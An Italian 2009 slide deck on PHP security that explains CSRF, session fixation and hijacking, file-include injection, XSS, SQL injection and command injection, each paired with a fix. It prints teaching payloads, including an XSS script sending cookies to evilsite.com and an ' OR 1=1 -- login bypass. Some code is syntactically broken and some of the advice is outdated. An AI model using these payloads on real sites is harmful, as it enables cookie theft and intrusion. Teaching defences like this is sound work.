1. PHP e sicurezza Roma, 19 marzo 2009 Massimiliano Arione

6. Filtri basilari di una form - 1 <form method=”post”> Username: <input type=”text” name=”username” /> Password: <input type=”password” name=”password” /> Country: <select name=”country”> <option value=”IT”>Italy</option> <option value=”FR”>France</option> <option value=”DE”>Germany</option> <!-- etc... --> </select> <input type=”submit” /> </form> PHP e sicurezza - Massimiliano Arione

7. Filtri basilari di una form - 2 $clean = array(); if (ctype_alpha($_POST['username'])) { $clean['username'] = $_POST['username']; } if (ctype_alnum($_POST['password'])) { $clean['password'] = $_POST['password']; } if (in_array($_POST['country'], $countries) { $clean['country'] = $_POST['country']; } PHP e sicurezza - Massimiliano Arione

8. Cross-Site Request Forgery (CSRF) Sfrutta la fiducia dell'applicazione nell'utente <form action=”checkout” method=”get”> <input type=”text” name=”isbn” /> <input type=”text” name=”qty” /> <input type=”submit” value=”checkout” /> </form> <img src=”checkout.php?isbn=0973862149&qty=2” /> PHP e sicurezza - Massimiliano Arione

9. Protezione da CSRF $token = md5(uniqid(rand(), true)); $_SESSION['token'] = $token; <form action=”checkout” method=”get”> <!-- etc... -> <input type=”hidden” name=”token” value=”<?php echo $token ?>” /> </form> if (isset($_SESSION['token']) && isset($_GET['token']) && $_SESSION['token'] == $_GET['token']) { // etc... } PHP e sicurezza - Massimiliano Arione

10. Session fixation L'utente viene indotto a cliccare su un link con id di sessione preconfezionata: <a href=”index.php?PHPSESSID=12345”>click</a> soluzione: session_start(); if (authenticate()) { session_regenerate_id(); } PHP e sicurezza - Massimiliano Arione

11. Session hijacking L'id di sessione dell'utente viene in qualche modo indovinata Soluzione: $_SESSION['ua'] = $_SERVER['HTTP_USER_AGENT']; if ($_SESSION['ua'] != $_SERVER['HTTP_USER_AGENT']) { exit; } PHP e sicurezza - Massimiliano Arione

12. Remote code injection Un utente invia come parametro una URL esterna index.php?section=news include 'includes/' . $_GET['section'] . '.php'; Soluzione: $clean['section'] = in_array($_GET['section'], $sections) ? $_GET['section'] : 'home'; include 'includes/' . $clean['section'] . '.php'; PHP e sicurezza - Massimiliano Arione

13. URL guessing Un utente sostituisce l'id che vede nella URL con uno diverso message.php?id=42 Soluzione: $message = getMessage($clean['id']); if ($message->getUserId() != $_SESSION['user_id']) { exit; } PHP e sicurezza - Massimiliano Arione

15. Cross-Site Scripting (XSS) Sfrutta la fiducia dell'utente nell'applicazione <script>document.location = 'http://evilsite.com?cookies=' + document.cookie;</script> Stored o unstored Soluzione: htmlentities() PHP e sicurezza - Massimiliano Arione

16. SQL injection $sql = 'SELECT * FROM user WHERE username=apos;' . $_POST['username'] . 'apos; AND password=apos;' . $_POST['password'] . 'apos;'; $_POST['username'] = 'apos; OR 1=1 --'; Soluzioni: mysql_escape_string() PDO prepared statements: $stmt->bindParam(':username', $clean['username'];

17. Command injection $files = passthru('grep -lr ' . $_POST['str'] . ' *'); Soluzione: escapeshellcmd() escapeshellarg() PHP e sicurezza - Massimiliano Arione

20. Domande? ? PHP e sicurezza - Massimiliano Arione